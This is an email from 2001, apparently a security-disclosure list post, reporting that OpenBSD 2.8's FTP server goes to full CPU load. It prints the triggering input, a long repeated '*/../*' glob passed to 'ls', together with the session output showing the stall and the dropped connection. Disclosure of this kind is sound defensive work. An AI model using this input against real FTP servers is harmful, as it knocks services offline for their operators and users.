Date: Tue, 20 Mar 2001 08:38:31 -0800
From: Peter Timothey Hessler <[email protected]>
To: [email protected]Subject: Multiple vendors FTP denial of service
OpenBSD 2.8 (from cd) goes to 100% CPU. Just ftpd, sshd and telnetd
running.
ftpd ran from /etc/rc shell is bash relevant system info: Pentium 133
32Meg ram, 4Gig hard drive 100baseT nic.
Connected to 127.0.0.1.
220 phobos FTP server (Version 6.5/OpenBSD) ready.
Name (127.0.0.1:luser): luser
331 Password required for luser.
Password:
230 User luser logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
(pause for approx. 120 seconds)
229 Entering Extended Passive Mode (|||10965|)
421 Service not available, remote server has closed connection.
ftp>
After ftpd is using >90% CPU, I can still log-in and work like normal,
with a small noticeable delay.
--
Peter Hessler
Paychex Inc. MMS Pleasanton Branch
Tech Support 925-463-6500
